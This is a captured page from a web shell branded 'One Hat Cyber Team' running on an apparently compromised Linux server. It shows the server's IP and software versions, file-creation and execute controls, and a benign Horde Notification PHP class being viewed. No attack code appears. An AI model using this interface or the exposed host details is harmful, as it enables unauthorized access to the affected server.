⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-pear
/
pear
/
php
/
Horde
/
View File Name :
Notification.php
* @category Horde * @license http://www.horde.org/licenses/lgpl21 LGPL 2.1 * @package Notification */ class Horde_Notification { /** * Horde_Notification instances. * * @var Horde_Notification */ protected static $_instances = array(); /** * Returns a reference to the global notification handler, only * creating it if it doesn't already exist. * * This method must be invoked as: * $notification = Horde_Notification::singleton([$stack]); * * @param string $stack The name of the message stack to use. * * return Horde_Notification_Handler The Horde Notification handler. */ public static function singleton($stack = 'horde_notification_stacks') { if (!isset(self::$_instances[$stack])) { self::$_instances[$stack] = new Horde_Notification_Handler(new Horde_Notification_Storage_Session($stack)); } return self::$_instances[$stack]; } }